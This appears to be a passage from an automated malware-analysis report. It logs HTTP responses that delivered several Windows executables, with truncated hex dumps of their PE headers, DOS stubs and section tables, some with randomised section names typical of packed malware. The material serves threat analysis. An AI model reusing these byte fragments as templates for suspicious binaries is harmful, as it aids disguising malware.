10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 06 00 00 04 00 00 2c e0 06 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 67 04 00 82 cf 01 00 e8 72 06 00 18 01 00 00 00 a0 06 00 f0 03 00 00 00 00 00 00 00 00 00 00 00 9c 06 00 e8 41 00 00 00 b0 06 00 ac 3d 00 00 60 78 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 77 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 70 06 00 e4 02 00 00 c0 63 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 92 26 06 00 00 10 00 00 00 28 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 29 00 00 00 40 06 00 00 18 00 00 00 2c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 ac 13 00 00 00 70 06 00 00 14 00 00 00 44 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 90 06 00 00 02 00 00 00 58 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 03 00 00 00 a0 06 00 00 04 00 00 00 5a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ac 3d 00 00 00 b0 06 00 00 3e 00 00 00 5e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 07 Nov 2024 03:12:20 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "1f3950-5e7e950876500"Accept-Ranges: bytesContent-Length: 2046288Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca 1d 00 5c 04 00 00 80 26 1d 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 89 d7 19 00 00 10 00 00 00 d8 19 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6c ef 03 00 00 f0 19 00 00 f0 03 00 00 dc 19 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 52 00 00 00 e0 1d 00 00 2e 00 00 00 cc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 40 1e 00 00 02 00 00 00 fa 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 50 1e 00 00 04 00 00 00 fc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 5c 08 01 00 00 60 1e 00 00 0a 01 00 00 00 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 07 Nov 2024 03:12:21 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "3ef50-5e7e950876500"Accept-Ranges: bytesContent-Length: 257872Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b 03 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 26 cb 02 00 00 10 00 00 00 cc 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 d4 ab 00 00 00 e0 02 00 00 ac 00 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 0b 00 00 00 90 03 00 00 08 00 00 00 7c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 a0 03 00 00 02 00 00 00 84 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 80 03 00 00 00 b0 03 00 00 04 00 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 c8 35 00 00 00 c0 03 00 00 36 00 00 00 8a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 07 Nov 2024 03:12:22 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "13bf0-5e7e950876500"Accept-Ranges: bytesContent-Length: 80880Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 e3 00 00 14 09 00 00 b8 00 01 00 8c 00 00 00 00 10 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 fa 00 00 f0 41 00 00 00 20 01 00 10 0a 00 00 80 20 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 20 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 dc 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 f4 05 00 00 00 f0 00 00 00 02 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 84 05 00 00 00 00 01 00 00 06 00 00 00 e4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 00 04 00 00 00 10 01 00 00 04 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 10 0a 00 00 00 20 01 00 00 0c 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 07 Nov 2024 03:12:26 GMTContent-Type: application/octet-streamContent-Length: 3228160Last-Modified: Thu, 07 Nov 2024 02:49:14 GMTConnection: keep-aliveETag: "672c2aaa-314200"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a7 bb 2d 49 e3 da 43 1a e3 da 43 1a e3 da 43 1a b8 b2 40 1b ed da 43 1a b8 b2 46 1b 42 da 43 1a 36 b7 47 1b f1 da 43 1a 36 b7 40 1b f5 da 43 1a 36 b7 46 1b 96 da 43 1a b8 b2 47 1b f7 da 43 1a b8 b2 42 1b f0 da 43 1a e3 da 42 1a 35 da 43 1a 78 b4 4a 1b e2 da 43 1a 78 b4 bc 1a e2 da 43 1a 78 b4 41 1b e2 da 43 1a 52 69 63 68 e3 da 43 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 9c 56 f0 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 ea 04 00 00 ca 01 00 00 00 00 00 00 50 31 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 80 31 00 00 04 00 00 db 49 31 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 a0 06 00 6b 00 00 00 00 90 06 00 e0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a4 37 31 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 54 37 31 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 80 06 00 00 10 00 00 00 80 06 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 e0 01 00 00 00 90 06 00 00 02 00 00 00 90 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 a0 06 00 00 02 00 00 00 92 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 6c 79 72 71 65 78 74 72 00 90 2a 00 00 b0 06 00 00 88 2a 00 00 94 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 67 6d 79 63 69 6b 6e 61 00 10 00 00 00 40 31 00 00 04 00 00 00 1c 31 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 50 31 00 00 22 00 00 00 20 31 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 07 Nov 2024 03:13:08 GMTContent-Type: application/octet-streamContent-Length: 1948672Last-Modified: Thu, 07 Nov 2024 01:19:50 GMTConnection: keep-aliveETag: "672c15b6-1dbc00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 fc 29 b7 a4 b8 48 d9 f7 b8 48 d9 f7 b8 48 d9 f7 0c d4 28 f7 ab 48 d9 f7 0c d4 2a f7 13 48 d9 f7 0c d4 2b f7 a6 48 d9 f7 b1 30 5d f7 b9 48 d9 f7 26 e8 1e f7 ba 48 d9 f7 ea 20 dc f6 86 48 d9 f7 ea 20 dd f6 99 48 d9 f7 ea 20 da f6 a2 48 d9 f7 b1 30 4a f7 a1 48 d9 f7 b8 48 d8 f7 f9 49 d9 f7 13 21 d0 f6 db 48 d9 f7 13 21 26 f7 b9 48 d9 f7 13 21 db f6 b9 48 d9 f7 52 69 63 68 b8 48 d9 f7 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 6b 91 24 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 10 00 60 05 00 00 24 02 00 00 00 00 00 00 c0 4b 00 00 10 00 00 00 70 05 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 f0 4b 00 00 04 00 00 11 5f 1e 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 64 b0 07 00 78 00 00 00 00 60 07 00 b8 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 64 4b 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 70 64 4b 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 50 07 00 00 10 00 00 00 aa 03 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 b8 4d 00 00 00 60 07 00 00 18 00 00 00 ba 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 b0 07 00 00 02 00 00 00 d2 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 30 2a 00 00 c0 07 00 00 02 00 00 00 d4 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 7a 6e 63 6c 6f 78 78 78 00 c0 19 00 00 f0 31 00 00 be 19 00 00 d6 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 73 66 74 6a 75 6c 6c 75 00 10 00 00 00 b0 4b 00 00 06 00 00 00 94 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 c0 4b 00 00 22 00 00 00 9a 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 07 Nov 2024 03:13:13 GMTContent-Type: application/octet-streamContent-Length: 158208Last-Modified: Thu, 07 Nov 2024 01:44:48 GMTConnection: keep-aliveETag: "672c1b90-26a00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 58 c1 80 e4 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 5e 02 00 00 0a 00 00 00 00 00 00 5e 7c 02 00 00 20 00 00 00 80 02 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 c0 02 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 0c 7c 02 00 4f 00 00 00 00 80 02 00 48 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 02 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 64 5c 02 00 00 20 00 00 00 5e 02 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 48 07 00 00 00 80 02 00 00 08 00 00 00 60 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 a0 02 00 00 02 00 00 00 68 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 7c 02 00 00 00 00 00 48 00 00 00 02 00 05 00 3c f3 00 00 d0 88 01 00 01 00 00 00 5f 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 4b 01 02 17 0b 14 00 ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 14 00 00 00 15 00 00 00 16 00 00 00 17 00 00 00 19 00 00 00 35 00 00 00 50 00 00 00 6e 00 00 00 77 00 00 00 7b 00 00 00 87 00 00 00 89 00 00 00 8a 00 00 00 8b 00 00 00 8f 00 00 00 a1 00 00 00 a2 00 00 00 85 01 00 00 bb 01 00 00 bd 01 00 00 d1 01 00 00 f4 01 00 00 02 02 00 00 0d 02 00 00 12 02 00 00 1f 02 00 00 7c 02 00 00 dd 03 00 00 de 03 00 00 e3 03 00 00 01 04 00 00 02 04 00 00 38 04 00 00 4b 04 00 00 99 05 00 00 f1 05 00 00 bb 06 00 00 14 07 00 00 15 07 00 00 5b 07 00 00 01 08 00 00 22 08 00 00 23 08 00 00 26 08 00 00 27 08 00 00 c4 0c 00 00 ea 0c 00 00 3d 0d 00 00 c4 13 00 00 46 14 00 00 a0 14 00 00 38 15 00 00 ff 15 00 00 00 16 00 00 0c 17 00 00 32 17 00 00 70 17 00 00 73 17 00 00 61 1e 00 00 90 1f 00 00 91 1f 00 00 fb 20 00 00 82 23 00 00 10 27 00 00 cb 2b 00 00 dd 63 00 00 87 69 00 00 89 69 00 00 8a 69 00 00 8b 69 00 00 50 4b 06 06 00 00 00 00 50 4b 03 04 1
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 07 Nov 2024 03:13:19 GMTContent-Type: application/octet-streamContent-Length: 3155968Last-Modified: Thu, 07 Nov 2024 02:48:53 GMTConnection: keep-aliveETag: "672c2a95-302800"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 53 d3 15 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 4a 04 00 00 d6 00 00 00 00 00 00 00 30 30 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 60 30 00 00 04 00 00 a3 39 30 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 54 a0 05 00 68 00 00 00 00 90 05 00 40 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 a1 05 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 